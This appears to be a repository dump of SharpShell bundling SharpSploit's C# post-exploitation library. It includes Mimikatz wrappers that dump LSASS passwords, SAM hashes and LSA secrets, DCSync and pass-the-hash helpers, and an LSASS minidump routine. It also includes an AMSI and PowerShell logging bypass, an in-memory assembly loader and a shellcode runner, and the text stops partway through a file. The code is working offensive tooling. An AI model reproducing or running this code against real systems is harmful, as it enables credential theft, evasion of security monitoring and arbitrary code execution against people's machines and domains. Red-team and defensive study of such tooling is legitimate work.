https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net40/System.Management.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net40/System.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net40/System.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net40/mscorlib.dll: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net40/mscorlib.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/references.yml: -------------------------------------------------------------------------------- 1 | - File: mscorlib.dll 2 | Framework: Net35 3 | Enabled: true 4 | - File: System.dll 5 | Framework: Net35 6 | Enabled: true 7 | - File: System.Core.dll 8 | Framework: Net35 9 | Enabled: true 10 | - File: System.Management.dll 11 | Framework: Net35 12 | Enabled: true 13 | - File: System.IdentityModel.dll 14 | Framework: Net35 15 | Enabled: true 16 | - File: System.DirectoryServices.dll 17 | Framework: Net35 18 | Enabled: true 19 | - File: System.Management.Automation.dll 20 | Framework: Net35 21 | Enabled: true 22 | - File: mscorlib.dll 23 | Framework: Net40 24 | Enabled: true 25 | - File: System.dll 26 | Framework: Net40 27 | Enabled: true 28 | - File: System.Core.dll 29 | Framework: Net40 30 | Enabled: true 31 | - File: System.Management.dll 32 | Framework: Net40 33 | Enabled: true 34 | - File: System.IdentityModel.dll 35 | Framework: Net40 36 | Enabled: true 37 | - File: System.DirectoryServices.dll 38 | Framework: Net40 39 | Enabled: true 40 | - File: System.Management.Automation.dll 41 | Framework: Net40 42 | Enabled: true -------------------------------------------------------------------------------- /SharpShell.API/Data/Resources/powerkatz_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/Resources/powerkatz_x64.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/Resources/powerkatz_x64.dll.comp: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/Resources/powerkatz_x64.dll.comp -------------------------------------------------------------------------------- /SharpShell.API/Data/Resources/powerkatz_x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/Resources/powerkatz_x86.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/Resources/powerkatz_x86.dll.comp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/Resources/powerkatz_x86.dll.comp -------------------------------------------------------------------------------- /SharpShell.API/Data/Resources/resources.yml: -------------------------------------------------------------------------------- 1 | - Name: SharpSploit.Resources.powerkatz_x86.dll 2 | File: powerkatz_x86.dll 3 | Platform: x86 4 | Enabled: false 5 | - Name: SharpSploit.Resources.powerkatz_x64.dll 6 | File: powerkatz_x64.dll 7 | Platform: x64 8 | Enabled: false 9 | - Name: SharpSploit.Resources.powerkatz_x86.dll.comp 10 | File: powerkatz_x86.dll.comp 11 | Platform: x86 12 | Enabled: true 13 | - Name: SharpSploit.Resources.powerkatz_x64.dll.comp 14 | File: powerkatz_x64.dll.comp 15 | Platform: x64 16 | Enabled: true -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/Credentials/Mimikatz.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Text; 7 | using 
System.Net.NetworkInformation; 8 | using System.Runtime.InteropServices; 9 | 10 | using SharpSploit.Misc; 11 | using SharpSploit.Execution; 12 | 13 | namespace SharpSploit.Credentials 14 | { 15 | /// 16 | /// (SharpSploit.Credentials.)Mimikatz is a library for executing Mimikatz functions. SharpSploit's implementation 17 | /// uses a PE Loader to execute Mimikatz functions. This is a wrapper class that loads the PE and executes user- 18 | /// specified Mimikatz functions 19 | /// 20 | /// 21 | /// Mimikatz is a tool for playing with credentials in Windows, written by Benjamin Delpy (@gentilkiwi). (Found 22 | /// at https://github.com/gentilkiwi/mimikatz). 23 | /// SharpSploit's PE Loader is adapted from work by Casey Smith (@subtee). (No longer available at original location.) 24 | /// This wrapper class is adapted from Chris Ross (@xorrior)'s implementation. (Found 25 | /// at https://github.com/xorrior/Random-CSharpTools/tree/master/DllLoader/DllLoader) 26 | /// 27 | public class Mimikatz 28 | { 29 | private static byte[] PEBytes32 { get; set; } 30 | private static byte[] PEBytes64 { get; set; } 31 | 32 | private static PE MimikatzPE { get; set; } = null; 33 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 34 | private delegate IntPtr MimikatzType(IntPtr command); 35 | 36 | /// 37 | /// Loads the Mimikatz PE with `PE.Load()` and executes a chosen Mimikatz command. 38 | /// 39 | /// Mimikatz command to be executed. 40 | /// Mimikatz output. 
public static string Command(string Command = "privilege::debug sekurlsa::logonPasswords")
{
    // The PE image is loaded on first use and cached in the static MimikatzPE property.
    if (MimikatzPE == null)
    {
        // Carried over from the original: the manifest resource names are read but not used below.
        string[] resourceNames = System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceNames();

        // IntPtr.Size picks the image that matches the bitness of the current process.
        // Detection note: the resource names and the export name used below are literal strings
        // in this source, so they are stable anchors for static signatures of a compiled build.
        switch (IntPtr.Size)
        {
            case 4:
                if (PEBytes32 == null)
                {
                    PEBytes32 = Utilities.GetEmbeddedResourceBytes("powerkatz_x86.dll");
                }
                if (PEBytes32 == null)
                {
                    return "";
                }
                MimikatzPE = PE.Load(PEBytes32);
                break;

            case 8:
                if (PEBytes64 == null)
                {
                    PEBytes64 = Utilities.GetEmbeddedResourceBytes("powerkatz_x64.dll");
                }
                if (PEBytes64 == null)
                {
                    return "";
                }
                MimikatzPE = PE.Load(PEBytes64);
                break;
        }
    }

    // Every failure path returns an empty string rather than throwing.
    if (MimikatzPE == null)
    {
        return "";
    }

    IntPtr exportAddress = MimikatzPE.GetFunctionExport("powershell_reflective_mimikatz");
    if (exportAddress == IntPtr.Zero)
    {
        return "";
    }

    MimikatzType entryPoint = (MimikatzType)Marshal.GetDelegateForFunctionPointer(exportAddress, typeof(MimikatzType));

    // NOTE(review): the buffer returned by StringToHGlobalUni is not released in this method.
    IntPtr commandBuffer = Marshal.StringToHGlobalUni(Command);
    try
    {
        return Marshal.PtrToStringUni(entryPoint(commandBuffer));
    }
    catch (Exception e)
    {
        Console.Error.WriteLine("MimikatzException: " + e.Message + e.StackTrace);
        return "";
    }
}

/// <summary>
/// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve plaintext
/// passwords from LSASS. Equates to `Command("privilege::debug sekurlsa::logonPasswords")`. (Requires Admin)
/// </summary>
/// <returns>Mimikatz output.</returns>
public static string LogonPasswords() => Command("privilege::debug sekurlsa::logonPasswords");

/// <summary>
/// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve password hashes
/// from the SAM database. Equates to `Command("privilege::debug lsadump::sam")`. (Requires Admin)
/// </summary>
/// <returns>Mimikatz output.</returns>
public static string SamDump() => Command("privilege::debug lsadump::sam");

/// <summary>
/// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve LSA secrets
/// stored in registry. Equates to `Command("privilege::debug lsadump::secrets")`. (Requires Admin)
/// </summary>
/// <returns>Mimikatz output.</returns>
public static string LsaSecrets() => Command("privilege::debug lsadump::secrets");

/// <summary>
/// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve Domain
/// Cached Credentials hashes from registry. Equates to `Command("privilege::debug lsadump::cache")`.
/// (Requires Admin)
/// </summary>
/// <returns>Mimikatz output.</returns>
public static string LsaCache() => Command("privilege::debug lsadump::cache");

/// <summary>
/// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve WDigest
/// credentials. Equates to `Command("sekurlsa::wdigest")`.
/// </summary>
/// <returns>Mimikatz output.</returns>
public static string Wdigest() => Command("sekurlsa::wdigest");

/// <summary>
/// Loads the Mimikatz PE with `PE.Load()` and executes each of the builtin local commands (not DCSync). (Requires Admin)
/// </summary>
/// <returns>Mimikatz output.</returns>
public static string All()
{
    // The helpers run in the original order; AppendLine ends each result with a newline.
    return new StringBuilder()
        .AppendLine(LogonPasswords())
        .AppendLine(SamDump())
        .AppendLine(LsaSecrets())
        .AppendLine(LsaCache())
        .AppendLine(Wdigest())
        .ToString();
}

/// <summary>
/// Loads the Mimikatz PE with `PE.Load()` and executes the "dcsync" module to retrieve the NTLM hash of a
/// specified (or all) Domain user. (Requires Domain Admin)
/// </summary>
/// <param name="user">Username to retrieve NTLM hash for. "All" for all domain users.</param>
/// <param name="FQDN">Optionally specify an alternative fully qualified domain name. Default is current domain.</param>
/// <param name="DC">Optionally specify a specific Domain Controller to target for the dcsync.</param>
/// <returns>Mimikatz output for the assembled "lsadump::dcsync" command.</returns>
public static string DCSync(string user, string FQDN = null, string DC = null)
{
    // "all" is matched case-insensitively through ToLower(), exactly as in the original.
    string target = user.ToLower() == "all" ? " /all" : " /user:" + user;

    // The machine's own domain name is looked up only when no FQDN was supplied.
    string domain = FQDN ?? IPGlobalProperties.GetIPGlobalProperties().DomainName;

    // NOTE(review): the arguments are concatenated without quoting or validation.
    string command = "lsadump::dcsync" + target + " /domain:" + domain;
    if (DC != null)
    {
        command += " /dc:" + DC;
    }
    return Command(command);
}

/// <summary>
/// Loads the Mimikatz PE with `PE.Load()` and executes the "pth" module to start a new process
/// as a user using an NTLM password hash for authentication.
/// </summary>
/// <param name="user">Username to authenticate as.</param>
/// <param name="NTLM">NTLM hash to authenticate the user.</param>
/// <param name="FQDN">Optionally specify an alternative fully qualified domain name. Default is current domain.</param>
/// <param name="run">The command to execute as the specified user.</param>
191 | /// 192 | public static string PassTheHash(string user, string NTLM, string FQDN = null, string run = "cmd.exe") 193 | { 194 | string command = "sekurlsa::pth"; 195 | command += " /user:" + user; 196 | if (FQDN != null) 197 | { 198 | command += " /domain:" + FQDN; 199 | } 200 | else 201 | { 202 | command += " /domain:" + IPGlobalProperties.GetIPGlobalProperties().DomainName; 203 | } 204 | command += " /ntlm:" + NTLM; 205 | command += " /run:" + run; 206 | return Command(command); 207 | } 208 | } 209 | } 210 | -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/Enumeration/Host.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.IO; 7 | using System.Diagnostics; 8 | using System.Collections.Generic; 9 | using Microsoft.Win32; 10 | 11 | using SharpSploit.Generic; 12 | 13 | namespace SharpSploit.Enumeration 14 | { 15 | /// 16 | /// Host is a library for local host enumeration. 17 | /// 18 | public class Host 19 | { 20 | /// 21 | /// Gets a list of running processes on the system. 22 | /// 23 | /// List of ProcessResults. 24 | public static SharpSploitResultList GetProcessList() 25 | { 26 | Process[] processes = Process.GetProcesses(); 27 | SharpSploitResultList results = new SharpSploitResultList(); 28 | foreach (Process process in processes) 29 | { 30 | results.Add(new ProcessResult(process.Id, 0, process.ProcessName)); 31 | } 32 | return results; 33 | } 34 | 35 | /// 36 | /// Generates a minidump that represents the memory of a running process. Useful for offline Mimikatz 37 | /// if dumping the LSASS process. (Requires Admin) 38 | /// 39 | /// Process ID of the process to generate a minidump for. 40 | /// Path to write output file in. Defaults to the current directory. 
/// Filename to output the minidump to.
///
/// Authored by Justin Bui (@youslydawg).
///
public static void CreateProcessDump(int processId, string outputPath = "", string outputFileName = "")
{
    // Resolve the PID to a Process object and hand over to the Process-based overload.
    Process target = Process.GetProcessById(processId);
    CreateProcessDump(target, outputPath, outputFileName);
}

/// <summary>
/// Generates a minidump that represents the memory of a running process. Useful for offline Mimikatz
/// if dumping the LSASS process. (Requires Admin)
/// </summary>
/// <param name="processName">Name of the process to generate a minidump for.</param>
/// <param name="outputPath">Path to write output file in. Defaults to the current directory.</param>
/// <param name="outputFileName">Filename to output the minidump to.</param>
/// <remarks>
/// Authored by Justin Bui (@youslydawg).
/// </remarks>
public static void CreateProcessDump(string processName = "lsass", string outputPath = "", string outputFileName = "")
{
    // A trailing ".exe" is stripped before the name is passed to GetProcessesByName.
    const string exeSuffix = ".exe";
    if (processName.EndsWith(exeSuffix))
    {
        processName = processName.Remove(processName.Length - exeSuffix.Length);
    }

    Process[] matches = Process.GetProcessesByName(processName);
    if (matches.Length == 0)
    {
        // No process with that name: nothing is written and nothing is reported.
        return;
    }

    // Only the first match is dumped when several processes share the name.
    CreateProcessDump(matches[0], outputPath, outputFileName);
}

/// <summary>
/// Generates a minidump that represents the memory of a running process. Useful for offline Mimikatz
/// if dumping the LSASS process. (Requires Admin)
/// </summary>
/// <param name="process">Process to generate a minidump for.</param>
/// <param name="outputPath">Path to write output file in. Defaults to the current directory.</param>
/// <param name="outputFileName">Filename to output the minidump to.</param>
/// <remarks>Authored by Justin Bui (@youslydawg).</remarks>
///
public static void CreateProcessDump(Process process, string outputPath = "", string outputFileName = "")
{
    // Defaults: the current directory and "<ProcessName>_<Pid>.dmp".
    // Detection note: with default arguments the dump lands in the working directory under
    // that name pattern, and the call below requests a full-memory dump.
    string directory = string.IsNullOrEmpty(outputPath) ? GetCurrentDirectory() : outputPath;
    string fileName = string.IsNullOrEmpty(outputFileName)
        ? process.ProcessName + "_" + process.Id + ".dmp"
        : outputFileName;
    string dumpPath = Path.Combine(directory, fileName);

    FileStream dumpStream = File.Create(dumpPath);
    bool written = false;
    try
    {
        written = Execution.Win32.Dbghelp.MiniDumpWriteDump(process.Handle, (uint)process.Id, dumpStream.SafeFileHandle, Execution.Win32.Dbghelp.MINIDUMP_TYPE.MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
    }
    catch (System.ComponentModel.Win32Exception e)
    {
        // Only Win32Exception is handled here; any other exception propagates to the caller.
        Console.Error.WriteLine(e.Message);
    }
    dumpStream.Close();

    // A failed dump leaves no file behind.
    if (!written)
    {
        File.Delete(dumpPath);
    }
}

/// <summary>
/// Gets the hostname of the system.
/// </summary>
/// <returns>Hostname of the system.</returns>
public static string GetHostname() => Environment.MachineName;

/// <summary>
/// Gets the Domain name and username of the current logged on user.
/// </summary>
/// <returns>Current username, in the form DOMAIN\user.</returns>
public static string GetUsername() => Environment.UserDomainName + "\\" + Environment.UserName;

/// <summary>
/// Gets the full path of the current working directory.
/// </summary>
/// <returns>Current working directory.</returns>
public static string GetCurrentDirectory() => Directory.GetCurrentDirectory();

/// <summary>
/// Gets a directory listing of the current working directory.
/// </summary>
/// <returns>List of FileSystemEntryResults.</returns>
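public static SharpSploitResultList<FileSystemEntryResult> GetDirectoryListing()
{
    // The generic type argument was lost in the listing; it is restored from the element
    // type that is added below.
    string currentDirectory = GetCurrentDirectory();
    SharpSploitResultList<FileSystemEntryResult> results = new SharpSploitResultList<FileSystemEntryResult>();

    // Directories first, then files, as in the original.
    foreach (string dir in Directory.GetDirectories(currentDirectory))
    {
        results.Add(new FileSystemEntryResult(dir));
    }
    foreach (string file in Directory.GetFiles(currentDirectory))
    {
        results.Add(new FileSystemEntryResult(file));
    }
    return results;
}

/// <summary>
/// Changes the current directory by appending a specified string to the current working directory.
/// </summary>
/// <param name="AppendDirectory">String to append to the current directory.</param>
public static void ChangeCurrentDirectory(string AppendDirectory)
{
    // Plain concatenation is kept on purpose: Path.Combine would treat a rooted
    // AppendDirectory as a replacement rather than a suffix.
    Directory.SetCurrentDirectory(GetCurrentDirectory() + "\\" + AppendDirectory);
}

/// <summary>
/// Reads a value stored in registry.
/// </summary>
/// <param name="RegPath">The full path to the registry value to be read.</param>
/// <returns>The value converted to a string, or null if it is missing or the read fails.</returns>
public static string RegistryRead(string RegPath)
{
    // Split at the LAST separator. The original located the value name with IndexOf(valueName),
    // which cuts the key short whenever the value name also occurs earlier in the path.
    int separatorIndex = RegPath.LastIndexOf(Path.DirectorySeparatorChar);
    string valueName = RegPath.Substring(separatorIndex + 1);

    // The key keeps its trailing separator, as it did in the original.
    string keyName = RegPath.Substring(0, RegPath.Length - valueName.Length);
    return RegistryRead(keyName, valueName);
}

/// <summary>
/// Reads a value stored in registry.
/// </summary>
/// <param name="RegKey">The RegistryKey to read from.</param>
/// <param name="RegValue">The name of name/value pair to read from in the RegistryKey.</param>
/// <returns>The value converted to a string, or null if it is missing or the read fails.</returns>
public static string RegistryRead(string RegKey, string RegValue)
{
    try
    {
        object reg = Registry.GetValue(RegKey, RegValue, null);
        return reg == null ? null : reg.ToString();
    }
    catch (Exception e)
    {
        // Failures are reported on stderr and surface to the caller as null.
        Console.Error.WriteLine("Registry read exception: " + e.Message);
        return null;
    }
}

/// <summary>
/// Writes a value in the registry.
/// </summary>
/// <param name="RegPath">The full path to the registry value to be written to.</param>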
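/// <param name="Value">The value to write to the registry key.</param>
/// <returns>True if the write succeeds, false if an exception is caught.</returns>
public static bool RegistryWrite(string RegPath, object Value)
{
    // Split at the LAST separator. The original located the value name with IndexOf(valueName),
    // which cuts the key short whenever the value name also occurs earlier in the path.
    int separatorIndex = RegPath.LastIndexOf(Path.DirectorySeparatorChar);
    string valueName = RegPath.Substring(separatorIndex + 1);

    // The key keeps its trailing separator, as it did in the original.
    string keyName = RegPath.Substring(0, RegPath.Length - valueName.Length);
    return RegistryWrite(keyName, valueName, Value);
}

/// <summary>
/// Writes a value in the registry.
/// </summary>
/// <param name="RegKey">The RegistryKey to write to.</param>
/// <param name="RegValue">The name of name/value pair to write to in the RegistryKey.</param>
/// <param name="Value">The value to write to the registry key.</param>
/// <returns>True if the write succeeds, false if an exception is caught.</returns>
public static bool RegistryWrite(string RegKey, string RegValue, object Value)
{
    try
    {
        Registry.SetValue(RegKey, RegValue, Value);
        return true;
    }
    catch (Exception e)
    {
        // Failures are reported on stderr and surface to the caller as false.
        Console.Error.WriteLine("Registry write exception: " + e.Message);
        return false;
    }
}

/// <summary>
/// ProcessResult represents a running process, used with the GetProcessList() function.
/// </summary>
public sealed class ProcessResult : SharpSploitResult
{
    public int Pid { get; } = 0;
    public int Ppid { get; } = 0;
    public string Name { get; } = "";

    // The generic type arguments were lost in the listing; they are restored from the
    // SharpSploitResultProperty element type used in the initializer.
    // A new list is built on every access.
    protected internal override IList<SharpSploitResultProperty> ResultProperties
    {
        get
        {
            return new List<SharpSploitResultProperty>
            {
                new SharpSploitResultProperty { Name = "Pid", Value = this.Pid },
                new SharpSploitResultProperty { Name = "Ppid", Value = this.Ppid },
                new SharpSploitResultProperty { Name = "Name", Value = this.Name }
            };
        }
    }

    public ProcessResult(int Pid = 0, int Ppid = 0, string Name = "")
    {
        this.Pid = Pid;
        this.Ppid = Ppid;
        this.Name = Name;
    }
}

/// <summary>FileSystemEntryResult represents a file system entry (file or directory) on disk, used with the GetDirectoryListing() function.</summary>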
282 | /// 283 | public sealed class FileSystemEntryResult : SharpSploitResult 284 | { 285 | public string Name { get; } = ""; 286 | protected internal override IList ResultProperties 287 | { 288 | get 289 | { 290 | return new List 291 | { 292 | new SharpSploitResultProperty 293 | { 294 | Name = "Name", 295 | Value = this.Name 296 | } 297 | }; 298 | } 299 | } 300 | 301 | public FileSystemEntryResult(string Name = "") 302 | { 303 | this.Name = Name; 304 | } 305 | } 306 | } 307 | } 308 | -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/Execution/Assembly.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using Reflect = System.Reflection; 7 | 8 | using SharpSploit.Generic; 9 | 10 | namespace SharpSploit.Execution 11 | { 12 | /// 13 | /// Assembly is a library for loading .NET assemblies and executing methods contained within them. 14 | /// 15 | public class Assembly 16 | { 17 | /// 18 | /// Loads a specified .NET assembly byte array and executes a specified method within a 19 | /// specified type with specified parameters. 20 | /// 21 | /// The .NET assembly byte array. 22 | /// The name of the type that contains the method to execute. 23 | /// The name of the method to execute. 24 | /// The parameters to pass to the method. 25 | /// GenericObjectResult of the method. 26 | public static GenericObjectResult AssemblyExecute(byte[] AssemblyBytes, String TypeName = "", String MethodName = "Execute", Object[] Parameters = default(Object[])) 27 | { 28 | Reflect.Assembly assembly = Load(AssemblyBytes); 29 | Type type = TypeName == "" ? assembly.GetTypes()[0] : assembly.GetType(TypeName); 30 | Reflect.MethodInfo method = MethodName == "" ? 
type.GetMethods()[0] : type.GetMethod(MethodName); 31 | var results = method.Invoke(null, Parameters); 32 | return new GenericObjectResult(results); 33 | } 34 | 35 | /// 36 | /// Loads a specified base64-encoded .NET assembly and executes a specified method within a 37 | /// specified type with specified parameters. 38 | /// 39 | /// The base64-encoded .NET assembly byte array. 40 | /// The name of the type that contains the method to execute. 41 | /// The name of the method to execute. 42 | /// The parameters to pass to the method. 43 | /// GenericObjectResult of the method. 44 | public static GenericObjectResult AssemblyExecute(String EncodedAssembly, String TypeName = "", String MethodName = "Execute", Object[] Parameters = default(Object[])) 45 | { 46 | return AssemblyExecute(Convert.FromBase64String(EncodedAssembly)); 47 | } 48 | 49 | /// 50 | /// Loads a specified .NET assembly byte array. 51 | /// 52 | /// The .NET assembly byte array. 53 | /// Loaded assembly. 54 | public static Reflect.Assembly Load(byte[] AssemblyBytes) 55 | { 56 | return Reflect.Assembly.Load(AssemblyBytes); 57 | } 58 | 59 | /// 60 | /// Loads a specified .NET assembly byte array. 61 | /// 62 | /// The base64-encoded .NET assembly byte array. 63 | /// Loaded assembly. 
64 | public static Reflect.Assembly Load(string EncodedAssembly) 65 | { 66 | return Reflect.Assembly.Load(Convert.FromBase64String(EncodedAssembly)); 67 | } 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/Execution/Shell.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Linq; 7 | using System.Reflection; 8 | using System.Diagnostics; 9 | using System.Management.Automation; 10 | 11 | namespace SharpSploit.Execution 12 | { 13 | /// 14 | /// Shell is a library for executing shell commands. 15 | /// 16 | public class Shell 17 | { 18 | /// 19 | /// Executes specified PowerShell code using System.Management.Automation.dll and bypasses 20 | /// AMSI, ScriptBlock Logging, and Module Logging (but not Transcription Logging). 21 | /// 22 | /// PowerShell code to execute. 23 | /// Switch. If true, appends Out-String to the PowerShellCode to execute. 24 | /// Switch. If true, bypasses ScriptBlock and Module logging. 25 | /// Switch. If true, bypasses AMSI. 26 | /// Output of executed PowerShell. 27 | /// 28 | /// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module 29 | /// logging bypass goes to Lee Christensen (@_tifkin). 
///
public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true)
{
    if (string.IsNullOrEmpty(PowerShellCode))
    {
        return "";
    }

    using (PowerShell ps = PowerShell.Create())
    {
        const BindingFlags privateStatic = BindingFlags.NonPublic | BindingFlags.Static;

        // Detection note: both switches work by reflection writes to non-public static fields
        // of types in the assembly that defines the PowerShell class (PSEtwLogProvider.etwProvider
        // and AmsiUtils.amsiInitFailed). Those type and field names are literal strings here.
        if (BypassLogging)
        {
            Type logProviderType = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
            if (logProviderType != null)
            {
                // The provider field is replaced with an EventProvider built on a fresh GUID.
                FieldInfo providerField = logProviderType.GetField("etwProvider", privateStatic);
                providerField.SetValue(null, new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()));
            }
        }

        if (BypassAmsi)
        {
            Type amsiUtilsType = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
            if (amsiUtilsType != null)
            {
                amsiUtilsType.GetField("amsiInitFailed", privateStatic).SetValue(null, true);
            }
        }

        ps.AddScript(PowerShellCode);
        if (OutString)
        {
            ps.AddCommand("Out-String");
        }

        // Each result object is rendered with ToString() and the pieces are joined with newlines.
        var results = ps.Invoke();
        string[] rendered = results.Select(R => R.ToString()).ToArray();
        string output = String.Join(Environment.NewLine, rendered);
        ps.Commands.Clear();
        return output;
    }
}

/// <summary>
/// Executes a specified Shell command, optionally with an alternative username and password.
/// Equates to `ShellExecuteWithPath(ShellCommand, "C:\\WINDOWS\\System32")`.
/// </summary>
/// <param name="ShellCommand">The ShellCommand to execute, including any arguments.</param>
/// <param name="Username">Optional alternative username to execute ShellCommand as.</param>
/// <param name="Domain">Optional alternative Domain of the username to execute ShellCommand as.</param>
/// <param name="Password">Optional password to authenticate the username to execute the ShellCommand as.</param>
/// <returns>Output of the ShellCommand.</returns>
74 | public static string ShellExecute(string ShellCommand, string Username = "", string Domain = "", string Password = "") 75 | { 76 | return ShellExecuteWithPath(ShellCommand, "C:\\WINDOWS\\System32\\", Username, Domain, Password); 77 | } 78 | 79 | /// 80 | /// Executes a specified Shell command from a specified directory, optionally with an alternative username and password. 81 | /// 82 | /// The ShellCommand to execute, including any arguments. 83 | /// The Path of the directory from which to execute the ShellCommand. 84 | /// Optional alternative username to execute ShellCommand as. 85 | /// Optional alternative Domain of the username to execute ShellCommand as. 86 | /// Optional password to authenticate the username to execute the ShellCommand as. 87 | /// Output of the ShellCommand. 88 | public static string ShellExecuteWithPath(string ShellCommand, string Path, string Username = "", string Domain = "", string Password = "") 89 | { 90 | if (ShellCommand == null || ShellCommand == "") return ""; 91 | 92 | string ShellCommandName = ShellCommand.Split(' ')[0]; 93 | string ShellCommandArguments = ""; 94 | if (ShellCommand.Contains(" ")) 95 | { 96 | ShellCommandArguments = ShellCommand.Replace(ShellCommandName + " ", ""); 97 | } 98 | 99 | Process shellProcess = new Process(); 100 | if (Username != "") 101 | { 102 | shellProcess.StartInfo.UserName = Username; 103 | shellProcess.StartInfo.Domain = Domain; 104 | System.Security.SecureString SecurePassword = new System.Security.SecureString(); 105 | foreach (char c in Password) 106 | { 107 | SecurePassword.AppendChar(c); 108 | } 109 | shellProcess.StartInfo.Password = SecurePassword; 110 | } 111 | shellProcess.StartInfo.FileName = ShellCommandName; 112 | shellProcess.StartInfo.Arguments = ShellCommandArguments; 113 | shellProcess.StartInfo.WorkingDirectory = Path; 114 | shellProcess.StartInfo.UseShellExecute = false; 115 | shellProcess.StartInfo.CreateNoWindow = true; 116 | 
shellProcess.StartInfo.RedirectStandardOutput = true; 117 | shellProcess.Start(); 118 | 119 | string output = shellProcess.StandardOutput.ReadToEnd(); 120 | shellProcess.WaitForExit(); 121 | 122 | return output; 123 | } 124 | } 125 | } -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/Execution/ShellCode.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Runtime.InteropServices; 7 | 8 | namespace SharpSploit.Execution 9 | { 10 | /// 11 | /// ShellCode includes a method for executing shellcode. 12 | /// 13 | public class ShellCode 14 | { 15 | [UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)] 16 | private delegate Int32 Run(); 17 | 18 | /// 19 | /// Executes a specified ShellCode byte array by copying it to pinned memory, modifying the memory 20 | /// permissions with VirtualProtect(), and executing using a delegate. 21 | /// 22 | /// ShellCode byte array to execute. 23 | /// Boolean. True if execution succeeds, false otherwise. 24 | /// Based upon code written by Matt Nelson (@enigma0x3) and Matt Graeber (@mattifestation). 
25 | public static bool ShellCodeExecute(byte[] ShellCode) 26 | { 27 | try 28 | { 29 | GCHandle pinnedArray = GCHandle.Alloc(ShellCode, GCHandleType.Pinned); 30 | IntPtr ptr = pinnedArray.AddrOfPinnedObject(); 31 | Marshal.Copy(ShellCode, 0, ptr, ShellCode.Length); 32 | 33 | uint flOldProtect = 0; 34 | if (!Win32.Kernel32.VirtualProtect(ptr, (UIntPtr)ShellCode.Length, 0x40, out flOldProtect)) 35 | { 36 | return false; 37 | } 38 | Run del = (Run)Marshal.GetDelegateForFunctionPointer(ptr, typeof(Run)); 39 | del(); 40 | return true; 41 | } 42 | catch (Exception e) 43 | { 44 | Console.Error.WriteLine("ShellCodeExecute exception: " + e.Message); 45 | } 46 | return false; 47 | } 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/Generic/Generic.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Text; 7 | using System.Linq; 8 | using System.Collections.Generic; 9 | using System.Collections; 10 | 11 | namespace SharpSploit.Generic 12 | { 13 | /// 14 | /// GenericObjectResult for listing objects whose type is unknown at compile time. 15 | /// 16 | public sealed class GenericObjectResult : SharpSploitResult 17 | { 18 | public object Result { get; } 19 | protected internal override IList ResultProperties 20 | { 21 | get 22 | { 23 | return new List 24 | { 25 | new SharpSploitResultProperty 26 | { 27 | Name = this.Result.GetType().Name, 28 | Value = this.Result 29 | } 30 | }; 31 | } 32 | } 33 | 34 | public GenericObjectResult(object Result) 35 | { 36 | this.Result = Result; 37 | 